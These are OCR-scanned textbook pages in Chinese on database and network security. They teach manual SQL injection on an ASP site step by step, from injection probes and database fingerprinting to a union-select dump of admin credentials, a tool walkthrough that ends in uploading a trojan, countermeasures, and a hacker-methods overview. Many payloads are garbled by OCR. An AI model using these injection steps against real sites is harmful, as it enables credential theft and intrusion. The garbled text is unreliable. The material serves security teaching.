(3) 第 三 步 ,207http ://xxx. xxx. xxx /abc. asp? id 一 207 and 1 一 2( 附 加 and 1— 1). 
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[E «p A EB [WI http://wwwoo-cominens.asp?d- 19627 


soft JET Database Engine 错误 “80040e14" 
FARNESE 在 查询 表达 式 “id = 207 Pe 
news asp. 行 157 


5.29 附加 一 个 单 引号 


国家 | eden dat cgi 
Ge, UU fri: 
ERRARE FARERI RERNE, rat 
AF lU RS TVA ERE TENERE ORR, 经 检验 合格 后 


道 的 13 个 锐 超 标 产 品 暂停 销售 和 使 用 。 蔡 监督 栓 
产品 依法 处 理 。 对 违反 规定 生产 销售 使 用 刹 用 空 


图 5.30 加 and 1=1 


http://xxx. xxx. xxx /abc. asp? id—1 and 1 一 2, 运 行 异 常 ,如 图 5. 31 所 示 。 


Su B USERS T 'd-2979620and95201-2 AMO Ke 
RIAN 
m mss 设 有 项 到 好 要 查看 的 后 息 ? 
qp seem G*ttmniBCHA. XZHvmherTAt 


图 5.31 加 and 1=2 


如 果 以 上 三 步 全 面 满足 ,该 脚本 中 一 定 存 在 SQL 注入 漏洞 。 

2) 判断 数据 库 的 类 型 

由 于 SQL 注入 漏洞 攻击 利用 的 是 通用 的 SQL 语法 ,使 得 这 种 攻击 具有 广泛 性 。 理 
论 上 来 说 ,对 于 所 有 基于 SQL 语言 的 数据 库 管理 系统 都 是 有 效 的 ,包括 MS SQL Server, 
Oracle, DB2, Sybase, Access 和 MySQL 等 。 然而 ,不 同 数据 库 的 函数 、 自 身 的 SQL 扩展 
功能 也 会 有 所 不 同 ,对 于 不 同 的 数据 库 管 理 系统 其 攻击 方式 也 不 同 。 所 以 在 注入 之 前 ,还 
要 判断 一 下 数据 库 的 类 型 。 一般 ASP 最 常 搭配 的 数据 库 是 Access 和 SQL Server. 

CD 利用 数据 库 服 务 器 的 系统 变量 区 分 数据 库 类 型 。 

SQL Server 有 user. db_name() 等 系统 变量 ,利用 这 些 系 统 值 不 仅 可 以 判断 SQL 
Server, 还 可 以 得 到 大 量 有 用 信息 。 如 HTTP://xxx. xxx. xxx/abc. asp? p— YY and 
user>0 不 仅 可 以 判断 是 否 是 SQL Server, 还 可 以 得 到 当前 连接 到 数据 库 的 用 户 名 

HTTP://xxx. xxx. xxx/abc. asp? p— YY&n... db_name() 二 0 不 仅 可 以 判断 是 
否 是 SQL Server, 还 可 以 得 到 当前 正在 使 用 的 数据 库 名 。 

(2) 利用 系统 表 区 分 数据 库 类 型 。 

Access 和 SQL Server 都 有 自己 的 系统 表 , 比 如 存放 数据 库 中 所 有 对 象 的 表 , Access 
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是 在 系统 表 msysobjects 中 ,但 在 Web 环境 下 读 该 表 会 提示 “没有 权限 ”,SQL Server 是 
在 表 sysobjects 中 ,在 Web 环境 下 可 正常 读 取 。 对 于 以 下 两 条 语句 : 


HTTP: //xxx xxx .xxx/abc.asp?p- YY and (select count ( * ) from syscbjects)>0 
HTTP: //xxx.xxx.xxx/abc.asp?p- YY and (select count ( * ) from msysdbjects) » 0 


若 数据 库 是 SQL Server, 则 第 一 条 ,abc. asp 一 定 运 行 正常 ,第 二 条 则 异常 ;若是 
ACCESS 则 两 条 都 会 异常 。 

3) 通过 注入 获得 所 需要 的 数据 

获得 数据 库 中 的 有 用 数据 是 SQL 注入 攻击 的 主要 目的 ,如 管理 员 账 号 和 口令 等 。 

CD 猜测 管理 员 账 号 表 和 表 中 的 字段 及 长 度 。 

许多 程序 员 在 设计 数据 库 时 都 会 用 一 些 特定 的 名 称 作为 表 名 或 字段 名 ,也 就 是 说 数 
据 库 中 存放 的 表 名 或 字段 名 都 是 有 规律 可 循 的 ,黑客 通过 构建 特殊 数据 库 语句 在 数据 库 
中 依次 查找 管理 员 账 号 表 名 、 表 中 字段 名 、 用 户 名 和 密码 的 长 度 以 及 内 容 , 这 个 猜测 过 程 
可 以 通过 网 上 的 大 量 注 入 工具 快速 实现 ,同时 结合 黑客 收集 的 其 他 有 用 信息 ,从 而 轻易 破 
译 出 用 户 的 密码 ,也 可 以 手工 在 SQL 注入 漏洞 的 URL 链接 后 将 查询 条 件 蔡 换 成 特殊 语 
句 进行 破解 。 

例如 HTTP://xxx. xxx. xxx/abc. asp? id—1 And (Select Count( * ) from Admin) 7 — 
0。 如 果 页 面 与 HTTP;//xxx. xxx. xxx/abc. asp? id— 1 的 相同 ,说 明 附加 条 件 成 立 , 即 
表 名 Admin 存在 ,反之 , 即 不 存在 。 如 此 循环 ,直至 猜 到 表 名 为 止 。 表 名 猜 出 来 后 ,将 
Count( * ) 替换 成 Count( 字 段 名 ) ,用 同样 的 原理 猿 解 字段 名 。 最 后 ,在 表 名 和 列 名 猜 解 
成 功 后 ,再 使 用 SQL 语句 ,得 出 字段 的 值 。 

(2) 猜测 用 户 名 和 密码 ,寻找 Web 后 台 管理 入 口 。 

在 成 功 猜测 出 管理 员 账 号 和 密码 字段 后 ,接着 就 是 破解 具体 的 用 户 名 和 和 密码。 比较 
常用 的 方法 是 ASCII 逐 字 解 码 法 ,一 位 一 位 地 逐步 猜测 出 具体 的 用 户 名 ,之 后 再 按照 类 
似 的 方法 一 位 一 位 地 猜测 出 对 应 的 密码 。 获 得 用 户 名 和 密码 后 ,可 以 借助 一 些 注入 工具 
轻而易举 地 获得 后 台 管 理 入 口 ,进入 网 站 的 后 台 管 理 系统 进行 人 侵 和 破坏 。 假 设 已 猜测 
得 知 表 Admin 中 存在 username 字段 ,ASCII 逐 字 解 码 法 如 下 。 

首先 , 取 第 一 条 记录 ,测试 长 度 http://xxx. xxx. xxx/abc. asp? id 一 1 and (select 
top 1 lenCusername) from Admin) 二 0。 如 果 top 1 的 username 长 度 大 于 0, 则 条 件 成 
立 ; 接 着 就 是 1,22, 3 这 样 测试 下 去 ,一 直到 条 件 不 成 立 为 止 ,比如 二 7 成 立 ,>8 不 
成 立 , 则 lenCusername) —8. 

在 得 到 username 的 长 度 后 ,用 midCusername. N. 1D. 截取 第 N 位 字符 ,再 使 用 asc 
(mid ( username, N, 1)) 得 到 ASCII fij. 比如 : id — 1 and (select top 1 asc (mid 
(username,1,1)) from Admin)770 得 到 第 1 位 字符 的 ASCI 码 , 需 要 注意 的 是 英文 和 
数字 的 ASCII 码 在 1 一 128 之 间 。 

4) 入 侵 和 破坏 

成 功 登 录 网 站 的 后 台 管 理 系 统 后 , 接 下 来 就 可 以 任意 进行 破坏 行为 ,如 自 改 网 页 、 上 
传 木马 、 留 后 门 、 修 改 或 泄漏 用 户 信 息 等 ,并 进一步 人 侵 数据 库 服 务 器 。 
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3. SQL 注入 攻击 防范 

SQL 注入 攻击 是 目前 网 络 攻击 的 主要 手段 之 一 。SQL 注入 攻击 是 从 正常 的 www 
端口 访问 ,而 且 表 面 看 起 来 跟 一 般 的 Web 页 面 访问 没什么 区 别 。 漏 洞 产 生 的 原因 主要 是 
对 用 户 提交 的 数据 和 输入 参数 没有 进行 严格 的 过 滤 和 限制 ,目前 防火 墙 不 能 对 SQL 注入 
漏洞 进行 有 效 的 防范 。 因 此 ,作为 网 站 管理 员 和 Web 应 用 开发 程序 员 ,必须 足够 地 重视 
SQL 注入 漏洞 。 为 了 尽 可 能 地 避免 遭 到 SQL 注入 攻击 ,可 以 从 以 下 几 方 面 着 手 。 

CD 对 用 户 提交 的 数据 和 输入 参数 进行 严格 的 过 滤 。 对 输入 字段 中 的 逗号 . 单 引号 、 
双 引 号 和 分 号 等 特殊 符号 进行 限制 和 过 滤 , 防 止 非 授权 登录 。 过 滤 所 有 输入 字段 中 的 
select delete .from union 和 exec 等 命令 ,以 防止 服务 器 操作 。 限 制 输 入 字段 长 度 , 并 用 
服务 器 端 脚本 验证 输入 长 度 , 凡 是 非法 执行 程序 均 给 出 错误 提示 。 

C20 对 数据 库 服务 器 进行 权限 设置 ,尽量 不 要 让 Web 页 面 以 超级 管理 员 的 身份 连接 
数据 ,除非 有 特殊 需要 ,不 要 授予 读 取 系 统 表 和 执行 系统 存储 过 程 的 权限 ,对 用 户 表 , 也 要 
严格 考虑 权限 的 设置 ,只 进行 读 操作 的 ,坚决 不 要 授予 更 新 和 插入 等 权限 。 

(3) 握 弃 动态 SQL 语句 , 改 用 用 户 存储 过 程 来 访问 操作 数据 。 在 建立 数据 库 后 , 仔 
细 分 析 Web 页 面 需要 对 数据 库 进行 的 各 种 操作 ,并 为 之 建立 存储 过 程 , 然 后 让 Web 页 面 
调用 存储 过 程 来 完成 数据 库 操作 。 这 样 ,用 户 提交 的 数据 将 不 是 用 来 生成 动态 SQL ifi 
句 , 而 是 作为 参数 确 确实 实地 传递 给 存储 过 程 ,从 而 有 效 阻 断 SQL 注入 的 途径 。 

(4) 数据 敏感 信息 非常 规 加 密 , 通 过 在 程序 中 对 口令 等 敏感 信息 加 密 都 是 采用 md5 
函数 进行 加 密 , 即 密 文王 md5( 明 文 ) ,本 文 推荐 在 原来 的 加 密 的 基础 上 增加 一 些 非常 规 的 
方式 , 即 在 md5 加 密 的 基础 上 附带 一 些 值 , 如 密 文王 md5(md5( 明 文 ) 十 123456) 。 

(5) 关闭 或 删除 不 必要 的 交互 式 提交 表单 页 面 ,在 代码 层 就 屏蔽 掉 不 安全 的 script 
等 危险 字符 ,从 而 有 效 地 阻止 某 些 注入 攻击 。 

(6) 作为 网 站 管理 员 要 及 时 打 补 丁 并 强化 数据 ,禁用 不 必要 的 服务 和 功能 ,对 数据 库 
活动 进行 监视 ,利用 工具 或 设备 ,对 Web 页 面 中 的 攻击 行为 进行 监测 ,及 早 预防 。 


5.4.2. 实践 案例 5-1. 手动 SQL 注入 攻击 


上 述 http://xxx. xxx. xxx /abc. asp? id—207 网 页 经 过 三 步 判断 之 后 发 现 网 页 存在 
注入 漏洞 ,可 进行 注入 攻击 , 接 下 来 进行 如 下 操作 。 

CD 猜 解 管理 员 账 号 表 和 表 中 的 字段 

首先 猜测 管理 员 账 号 表 : 在 域名 后 添加 And(Select Count( * )from admin) > —0, 
页 面 显 示 不 变 , 说 明 管 理 员 账 号 表 名 为 admin, 

其 次 猜测 用 户 名 字段 : 在 域名 后 添加 And (Select Count(admin_name) from admin) 
二 ==0, 页 面 显 示 不 变 ,说 明 用 户 名 字段 为 admin_name。 

然后 猜测 用 户 密 码 字 段 : 在 域名 后 添加 And (Select Count(admin_pwd) from 
admin) 之 一 0, 页 面 显示 不 变 , 说 明 用 户 密码 字段 为 admin_pwd。 

(2) 推断 页 面 查询 语句 中 查询 的 字段 个 数 ,在 域名 后 添加 order by 1( 图 5. 32) ,如 果 
网 页 显示 正常 , 则 依次 改 为 添加 order by 2、order by 3… 直 到 变 为 order by 12( 图 5. 33) 
时 网 页 显示 错误 ,因此 可 推断 本 查询 语句 查询 了 有 11 个 字段 。 
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图 5.32 在 域名 后 添加 “order by 1” 
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图 5.33 在 域名 后 添加 “order by 12" 


(3) 推断 各 字段 的 显示 位 置 。 在 域名 后 加 union select 1,2,3,4,5,6,7,8,9,10,11 
from admin, 显 示 结 果 如 图 5. 34 所 示 ,表明 第 3.4.7 个 字段 显示 在 页 面 中 。 
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Q 5.34 ”在 域名 后 加 “union select 1,2,3,4,5,6,7,8,9,10,11 from admin" 


(4) 在 页 面 显 示 用 户 名 和 密码 。 通 过 第 (1) 步 的 猜测 用 户 名 、 密 码 字段 得 到 字段 名 分 
别 为 admin name 和 admin_pwd, 将 第 (3) 步 的 union select 语句 中 的 4,7 分 别 替 换 成 
admin name 和 admin_pwd, 按 回 车 键 ,union 语句 变 为 union select 1,2,3,admin_name， 
5,6,admin_pwd,8,9,10,11 from admin, 则 select 语句 查询 得 到 的 用 户 名 和 密码 将 在 4、 
7 的 位 置 进行 显示 ,如 图 5. 35 所 示 。 
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图 5.35 得 到 用 户 名 和 密码 


得 到 用 户 名 为 209209209 ,密码 为 经 过 MD5 加 密 的 字符 串 ,通过 MD5 解密 ,可 得 到 
密码 。 
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5.4.3 实践 案例 5-2. 使 用 注入 工具 进行 攻击 


使 用 注入 工具 进行 攻击 的 步骤 如 下 ,如 图 5. 36 所 示 。 
CD 安装 入侵 工具 软件 ,打开 工具 窗口 ; 

(2) 复制 人 侵 站 点 地 址 ,复制 到 当前 路 径 ; 

(3) 发 现 有 漏洞 的 链接 ; 

(4) 选择 一 个 注入 点 ,检测 注入 ; 

(5) 开始 检测 ,猜测 表 名 ,猜测 列 名 , 猜 解 内 容 ; 

(6) 扫描 管理 入 口 ; 

(7) 使 用 用 户 名 和 密码 登录 后 台 ,找到 Webshell; 
(8) 找到 上 传 的 地 方 上 传 木 马 。 


DD 啊 D 注 入 工具 v2.32 增强 版 瞳 组 技术 论坛 Http:/Vwww- darkst. co 


UU Access OC HUONTRUR 
当前 用 户 


图 5.36 使 用 注入 工具 进行 攻击 


5.5 数据 库 系 统 加 固 策略 


为 了 保证 数据 库 系统 的 安全 ,根据 数据 库 系统 威胁 发 生前 的 检测 .发生 时 的 监督 和 发 
生 后 的 故障 恢复 ,结合 现 有 的 数据 库 安 全 技术 ,可 以 对 数据 库 系 统 实施 以 下 几 种 安全 
措施 。 
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5.5.1 备份 机 制 


数据 库 系 统 安全 技术 的 应 用 在 很 大 程度 上 降低 了 数据 库 系统 的 安全 威胁 ,但 是 问题 
仍然 难以 避免 。 为 了 确保 数据 库 遭 到 攻击 破坏 后 ,能 够 及 时 地 修复 ,必须 按时 进行 数据 库 
的 备份 工作 。 

首先 ,对 数据 库 备 份 要 防止 陷入 备份 就 是 拷贝 的 误区 ,拷贝 仅仅 是 复制 ,但 是 备份 除 
了 进行 数据 的 拷贝 工作 外 ,还 要 对 拷贝 的 数据 进行 管理 。 可 以 这 样 说 ,拷贝 只 是 备份 工作 
的 一 部 分 或 者 说 一 个 开始 。 因 为 数据 库 系统 每 天 处 理 的 数据 量 是 很 大 的 ,如 果 仅 仅 进行 
拷贝 工作 ,而 不 对 备份 数据 进行 管理 ,这 些 数据 对 于 故障 后 的 系统 恢复 是 很 难 起 到 必要 作 
用 的 。 

由 于 数据 库 系 统 的 复杂 程度 不 同 ,所 以 不 能 千篇一律 ,应 该 结合 实际 情况 选择 切实 有 
效 的 备份 策略 。 备 份 策 略 包括 确定 需 备份 的 内 容 、 备 份 时 间 及 备份 方式 。 目 前 采用 较 多 
的 安全 策略 主要 有 完全 备份 . 增 量 备份 和 差异 备份 三 种 策略 。 


5.5.2. 防火 墙 和 人 侵 检 测 


网 络 系统 的 安全 是 数据 库 安 全 的 第 一 道 屏障 ,外 部 人 侵 首 先 就 是 从 人 侵 网 络 系统 开 
始 的 ,因此 ,必须 采取 有 效 的 措施 来 保障 系统 的 安全 。 主 要 手段 有 防火 墙 和 入 侵 检 测 
技术 。 

防火 墙 作 为 系统 的 第 一 道 防线 , 它 的 主要 作用 是 监测 和 控制 可 信任 网 络 和 不 可 信任 

网 络 之 间 的 访问 通道 ,可 在 内 部 与 外 部 网 络 之 间 形 成 一 道 防护 屏障 ,拦截 来 自 外 部 的 非法 
访问 并 阻止 内 部 信息 的 外 汇 。 
入 侵 检 测 是 近 几 年 来 发 展 起 来 的 一 种 防范 技术 。 它 综合 采用 了 统计 技术 、 规 则 方法 、 
网 络 通信 技术 、 人 工 智 能 、 密 码 学 以 及 推理 等 技术 和 方法 ,用 来 监控 网 络 和 计算 机 系统 是 
否 出 现 被 入侵 或 滥用 。 经 过 不 断 发 展 和 完善 ,IDS 系统 作为 监控 和 识别 攻击 的 标准 解决 
方案 已 经 成 为 安全 防御 系统 的 重要 组 成 部 分 。 


5.5.3 审计 机 制 


安全 技术 的 发 展 并 不 能 确保 一 个 系统 不 存在 任何 安全 漏洞 。 合 法 用 户 在 经 过 身份 认 
证 后 滥用 权力 ,获取 机 密 数 据 , 曹 意 破 坏 、 恶 意 攻击 等 现象 时 而 出 现 。 审 计 是 用 事后 追查 
来 保证 数据 库 安 全 的 措施 ,审计 的 目的 是 检查 访问 模式 、 发 现 绕 过 系统 控制 的 企图 、 发 现 
桂 权 的 使 用 、 扮 演 监 督 角色 和 提供 附加 证 明 。 通 过 审计 ,可 以 把 用 户 对 数据 库 的 所 有 操作 
自动 记录 下 来 放 入 审计 日 志 中 ,可 以 监视 用 户 对 数据 库 的 各 种 操作 , 当 数 据 库 出 现 故 障 
时 ,可 以 根据 审计 日 志 , 重 现 导 致 数据 库 现 有 状况 的 一 系列 事件 , 找 出 非法 存 取 数 据 的 人 、 
时 间 和 内 容 等 ,以 便于 追查 有 关 责 任 , 同 时 审计 也 有 助 于 发 现 系统 安全 方面 的 弱点 和 
漏洞 。 
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5.5.4 视图 机 制 


数据 库 中 存放 着 大 量 的 基本 表 , 这 些 表 中 更 是 存放 着 大 量 的 重要 数据 ,而 且 数据 库 中 
的 数据 元 余 度 很 低 ,一 旦 遭 到 破坏 ,就 很 难 恢复 ,会 带 来 严重 的 后 果 和 损失 。 为 了 限制 用 
户 对 基本 表 的 操作 ,对 于 数据 库 系统 的 一 般 使 用 者 ,可 以 不 给 予 其 修改 基本 表 的 权力 ,只 
给 他 们 访问 视图 和 存储 过 程 的 权限 。 

视图 是 一 种 虚 表 , 它 是 建立 在 一 个 或 是 几 个 基本 数据 表 基 础 之 上 的 ,是 数据 库 系统 提 
供给 用 户 以 多 种 角度 观察 数据 库 中 数据 的 一 种 重要 机 制 。 视 图 和 存储 过 程 同 数据 库 中 的 
其 他 对 象 一 样 ,也 要 进行 权限 设 定 , 这 样 用 户 只 能 取得 对 视图 和 存储 过 程 的 授权 ,而 无 法 
访问 基本 表 。 


5.6 课 后 体会 与 练习 


1. 数据 库 的 常规 安全 设置 有 哪些 ? 

2. 数据 库 备 份 和 还 原 技术 对 于 保障 信息 安全 的 重要 意义 是 什么 ? 
3. 简 述 SQL 攻击 的 一 般 过 程 。 

A. 如 何 判 断 一 个 动态 网 页 是 否 可 以 注入 ? 
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亏本 章 课 前 准备 

学 习 本 章 内 容 之 前 ,需要 准备 如 下 知识 : 
。 查找 黑客 攻击 的 典型 案例 ; 

。 了 解 网 络 安全 相关 技术 内 容 。 

< 本 章 教学 目标 

本 章 的 教学 目标 是 : 

。 了解 网 络 安全 相关 技术 的 主要 构成 ; 
。 掌握 常规 的 网 络 安 全 攻击 及 防范 技术 。 
过 本 章 教学 要 点 

本 章 的 教学 要 点 包括 : 

。 黑客 攻 击 及 防范 技术 ; 

。 防火墙 原理 及 配置 。 
亏本 章 教学 建议 

本 章 内 容 采 用 案例 引导 模式 进行 教学 。 


6.1 网 络 安全 概述 


当今 ,社会 网 络 已 经 成 为 信息 交流 便利 和 开放 的 代名词 ,然而 伴随 计算 机 与 通信 技术 
的 迅猛 发 展 ,网 络 攻 击 与 防御 技术 也 在 交替 递 升 ,原本 网 络 固有 的 优越 性 、 开 放 性 和 互联 
性 变 成 信息 安全 隐患 的 便利 桥梁 。 网 络 安全 已 变 成 越 来 越 棘手 的 问题 。 

从 历次 黑客 事件 可 以 看 出 ,目前 ,全 世界 的 军事 .经济 .社会 和 文化 各 个 方面 都 越 来 越 
依赖 于 计算 机 网 络 , 人 类 社会 对 计算 机 的 依赖 程度 达到 空前 的 记录 。 由 于 计算 机 网 络 的 
脆弱 性 ,这 种 高 度 的 依赖 性 使 得 国家 的 经 济 和 国防 安全 变 得 十 分 脆弱 ,一 旦 计算 机 网 络 受 
到 攻击 而 不 能 正常 工作 ,甚至 瘫痪 ,整个 社会 就 会 陷入 危 机 。 

当今 网 络 成 为 国家 间 博 弈 的 舞台 ,各 种 先进 的 技术 层出不穷 ,各 个 国家 都 在 打造 一 支 
属于 自己 的 网 络 队伍 ,网 络 战争 也 进入 一 个 很 微妙 的 时 期 ,夺取 战争 主动 权 , 不 再 是 子弹 
枪 炮 ,而 是 流动 在 网 线 中 的 比特 和 字 节 。 由 于 受 技术 条 件 的 限制 ,很 多 人 对 网 络 安全 的 意 
识 仅 停留 在 如 何 防 范 病 毒 阶段 ,对 网 络 安全 缺乏 整体 意识 。 比 如 电影 ( 虎 胆 龙 威 4》 中 所 
描述 的 ,一 旦 战事 爆发 ,整个 城市 的 交通 灯 、 天 然 气 ,通信 和 电力 都 会 被 黑客 控制 。 也 许 电 
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影 中 描述 得 比较 夸张 ,但 是 谁 又 能 预料 随 着 互联 网 的 快速 发 展 , 这 一 切 不 会 变 成 可 能 呢 ? 
未 来 网 络 战 的 趋势 ,将 会 是 通过 系统 漏洞 发 送 病毒 ,破坏 对 方 的 计算 机 系统 ,造成 敌 方 指 
挥 系 统 瘫痪 ,使 其 无 法 正常 工作 。 更 有 其 者 盗 取 机 密 资料 ,向 对 方 发 出 错误 的 作战 引导 信 
号 ,再 配合 其 他 形式 的 攻击 ,从 而 达到 最 终 胜利 的 目的 。 


6.2 黑客 攻击 技术 


6.2.1 关于 黑客 


随 着 互联 网 的 迅速 发 展 ,黑客 也 就 随 之 诞生 ,黑客 成 就 了 互联 网 ,同时 也 成 就 了 自由 
软件 ,黑客 成 为 计算 机 和 互联 网 发 展 过 程 中 的 一 个 重要 角色 。 

黑客 (Hacker) 是 一 群 喜欢 用 智力 通过 创造 性 方法 来 挑战 脑力 极限 的 人 ,特别 是 他 们 
所 感 兴趣 的 领域 ,例如 电脑 编程 或 电器 工程 。 黑 客 最 早 源 自 英文 Hacker, 这 个 词 早期 在 
美国 的 电脑 界 是 带 有 襄 义 的 , 原 指 热心 于 计算 机 技术 水 平 高 超 的 电脑 专家 ,尤其 是 程序 
设计 人 员 。 但 到 今天 ,黑客 一 词 已 被 用 于 泛 指 那些 专门 利用 电脑 网 络 搞 破坏 或 恶作剧 的 
家 伙 。 对 这 些 人 的 正确 英文 叫 法 是 Cracker, 有 人 翻译 成 “ 骇 客 ”。 

黑客 和 骇 客 根本 的 区 别 是 : 黑客 们 建设 ,而 骇 客 们 破坏 。 也 有 人 叫 黑客 为 Hacker, 


6.2.2 黑客 攻击 的 动机 和 步 又 


1. 黑客 攻击 的 动机 

黑客 的 类 型 不 同 ,所 以 他 们 的 动机 也 不 尽 相同 。 有 的 黑客 纯粹 是 恶作剧 ,有 的 黑客 是 
为 了 窃取 、 修 改 或 者 删除 系统 中 的 相关 信息 ,有 的 黑客 是 为 显示 自己 的 网 络 技术 ,有 的 黑 
客 是 为 商业 利益 ,而 有 的 黑客 是 出 于 政治 目的 等 。 

2. 黑客 攻击 的 步骤 

黑客 和 人 侵 一 个 系统 的 最 终 目 标 一 般 是 获得 目标 系统 的 超级 用 户 ( 管 理 员 ) 权 限 , 对 目 
标 系统 进行 绝对 控制 ,窃取 其 中 的 机 密 文件 等 重要 信息 。 黑 客人 侵 的 步骤 如 图 6. 1 所 示 ， 
一 般 可 以 分 为 3 个 阶段 : 确定 目标 与 收集 相关 信息 、 获 得 对 系统 的 访问 权力 以 及 隐藏 


新 账号 


获得 普通 攻击 其 他 | 
用 户 权限 主机 


图 6.1 黑客 人 侵 的 步骤 
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1) 确定 目标 与 收集 相关 信息 

黑客 对 一 个 大 范围 的 网 络 进 行 扫描 以 确定 潜在 的 入 侵 目 标 ,锁定 目标 后 ,还 要 检查 要 
被 人 侵 目 标的 开放 端口 ,并 且 进 行 服务 分 析 , 获 取 目 标 系统 提供 的 服务 和 服务 进程 的 类 型 
和 版 本 、 目 标 系统 的 操作 系统 类 型 和 版 本 等 信息 ,看 是 否 存在 能 够 被 利用 的 服务 ,以 寻找 
该 主机 上 的 安全 漏洞 或 安全 弱点 。 

2) 获得 对 系统 的 访问 权力 

当 黑 客 探测 到 足够 的 系统 信息 ,对 系统 的 安全 弱点 了 解 后 就 会 发 动 攻击 ,不 过 黑客 会 
根据 不 同 的 网 络 结构 和 不 同 的 系统 情况 而 采用 不 同 的 攻击 手段 。 

黑客 利用 找到 的 这 些 安全 漏洞 或 安全 弱点 ,试图 获取 未 授权 的 访问 权限 ,比如 利用 组 
冲 区 溢出 或 蛮 力 攻击 破解 口令 ,然后 登录 系统 。 然 后 再 利用 目标 系统 的 操作 系统 或 应 用 
程序 的 漏洞 ,试图 提升 在 该 系统 上 的 权限 ,获得 管理 员 权 限 。 

黑客 获得 控制 权 之 后 ,不 会 马上 进行 破坏 活动 ,不 会 立即 删除 数据 或 涂改 网 页 等 。 一 
般 和 人 侵 成 功 后 ,为 能 长 时 间 保 留 和 巩固 他 对 系统 的 控制 权 , 确 保 以 后 能 够 重新 进入 系统 ， 
黑客 会 更 改 某 些 系统 设置 ,在 系统 中 植 和 人 特洛伊 木马 或 其 他 一 些 远程 控制 程序 。 

黑客 下 一 步 可 能 会 窃取 主机 上 的 软件 资料 、 客 户 名 单 、 财 务 报表 或 信用 卡号 等 各 种 敏 
感 信息 ,也 可 能 什么 都 不 做 ,只 是 把 该 系统 作为 他 存放 黑客 程序 或 资料 的 仓库 ;黑客 也 可 
能 会 利用 这 台 已 经 攻陷 的 主机 去 继续 他 下 一 步 的 攻击 ,例如 继续 入 侵 内 部 网 络 , 或 者 将 这 
台 主机 作为 DDoS 攻击 的 一 员 。 

3. 隐藏 踪迹 

一 般 入 侵 成 功 后 ,黑客 为 了 不 被 管理 员 发 现 ,会 清除 日 志 、 删 除 复制 的 文件 ,隐藏 自己 
的 踪迹 。 日 志 往往 会 记录 一 些 黑客 攻击 的 蛛丝马迹 ,黑客 会 删除 或 修改 系统 和 应 用 程序 
日 志 中 的 数据 ,或 者 用 假日 志和 覆盖 它 。 


6.2.3 黑客 工具 


1. 扫描 器 

在 Internet 安全 领域 ,扫描 器 是 最 出 名 的 破解 工具 。 所 谓 扫 描 器 ,实际 上 是 自动 检测 
远程 或 本 地 主机 安全 性 弱点 的 程序 。 扫 描 器 选 通 TCP/IP 端口 和 服务 ,并 记录 目标 机 的 
回答 ,以 此 获得 关于 目标 机 的 信息 。 理 解 和 分 析 这 些 信 息 ,就 可 能 发 现 破坏 目标 机 安全 性 
的 关键 因素 。 常 用 的 扫描 器 有 很 多 ,如 NSS( 网 络 安全 扫描 器 ) .Strobe( 超 级 优化 TCP 端 
口 检测 程序 )、SATAN (安全 管理 员 的 网 络 分 析 工 具 )、Jakal、IdengTCPScan、 
CONNECT,FSPScan, XSCAN 和 SAFESuite 等 。 扫 描 器 还 在 不 断 发 展 变化 ,每 当 发 现 
新 的 漏洞 ,检查 该 漏洞 的 功能 就 会 被 加 入 已 有 的 扫描 器 中 。 扫 描 器 不 仅 是 黑客 用 作 网 络 
攻击 的 工具 ,也 是 维护 网 络 安全 的 重要 工具 ,系统 管理 人 员 必 须 学 会 使 用 扫描 器 。 

2. 口令 入 侵 

所 谓 口 令 入 侵 , 是 指 破解 口令 或 屏蔽 口令 保护 。 但 实际 上 ,真正 的 加 密 口令 是 很 难 逆 
向 破解 的 。 黑客 们 常用 的 口令 入 侵 工具 所 采用 的 技术 是 仿真 对 比 ,利用 与 原 口令 程序 相 
同 的 方法 ,通过 对 比分 析 , 用 不 同 的 加 密 口 令 去 匹配 原 口令 。 
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黑客 们 破解 口令 的 过 程 大 致 如 下 : 首先 将 大 量 字 表 中 的 单词 用 一 定 规则 进行 变换 ， 
再 用 加 密 算法 进行 加 密 。 看 是 否 与 etc/password 文件 中 加 密 口令 相 匹 配 ,车 有 , 则 口令 
很 可 能 被 破解 。 单 词 变换 的 规则 一 般 有 : 大 小 写 交 蔡 使 用 ;把 单词 正 向 、 反 向 拼写 后 , 接 
在 一 起 (如 cannac) ;在 每 个 单词 的 开头 和 /或 结尾 加 上 数字 1 等 。 同 时 ,在 Internet 上 有 
许多 字 表 可 用 。 如 果 用 户 选 择 口令 不 恰当 ,口令 落 入 字 表 库 , 黑 客 们 获得 etc/password 
文件 ,基本 上 就 等 于 完成 了 口令 破解 任务 。 

3. 特洛伊 木马 

所 谓 特洛伊 木马 (Trojan Horse) 是 指 任何 提供 隐藏 的 .用 户 不 希望 的 功能 的 程序 。 
它 可 以 以 任何 形式 出 现 ,可 能 是 任何 由 用 户 或 客户 引入 到 系统 中 的 程序 。 特 洛 伊 程序 提 
供 或 隐藏 一 些 功能 ,这 些 功 能 可 以 泄漏 一 些 系统 的 私有 信息 ,或 者 控制 该 系统 。 

特洛伊 程序 表面 上 是 无 害 的 甚至 有 用 的 程序 ,但 实际 上 潜伏 着 很 大 的 危险 性 。 如 在 
Wuarchive FTP daemon(ftpd)2. 2 版 中 发 现 有 特洛伊 程序 ,该 特洛伊 程序 允许 任何 用 户 
(本 地 的 和 远 端 的 ) 以 Root 账户 登录 UNIX。 这 样 的 特洛伊 程序 可 以 导致 整个 系统 被 侵 
入 ,因为 它 很 难 被 发 现 , 在 它 被 发 现 之 前 ,可 能 已 经 存在 几 个 星期 甚至 几 个 月 ,而 且 在 这 段 
时 间 内 ,具备 Root 权限 的 入 侵 者 ,可 以 将 系统 按照 他 的 需要 进行 修改 。 这 样 即使 这 个 特 
洛 伊 程 序 被 发 现 了 ,在 系统 中 也 留 下 了 系统 管理 员 可 能 没有 注意 到 的 漏洞 。 

4. 网 络 嗅 探 器 

Sniffer( 安 全 嗅 探 器 ) 用 来 截获 网 络 上 传输 的 信息 ,用 在 以 太 网 或 其 他 共享 传输 介质 
的 网 络 上 。 在 以 太 网 上 放置 Sniffer, 可 使 网 络 接口 处 于 广播 状态 ,从 而 截获 网 上 传输 的 
信息 。 利 用 Sniffer 可 截获 口令 、 秘 密 的 和 专 有 的 信息 ,用 来 攻击 相 邻 的 网 络 。Sniffer 的 
威胁 还 在 于 被 攻击 方 无 法 发 现 , 因 为 Sniffer 是 被 动 的 程序 ,本 身 在 网 络 上 不 留 下 任何 
痕迹 。 

5. 破坏 系统 

常见 的 破坏 装置 有 邮件 炸弹 和 病毒 等 。 其 中 邮件 炸弹 的 危害 性 较 小 ,而 病毒 的 危害 
性 则 很 大 。 邮 件 炸 弹 是 指 不 停 地 将 无 用 信息 传送 给 被 攻击 方 , 填 满 对 方 的 邮件 信箱 ,使 其 
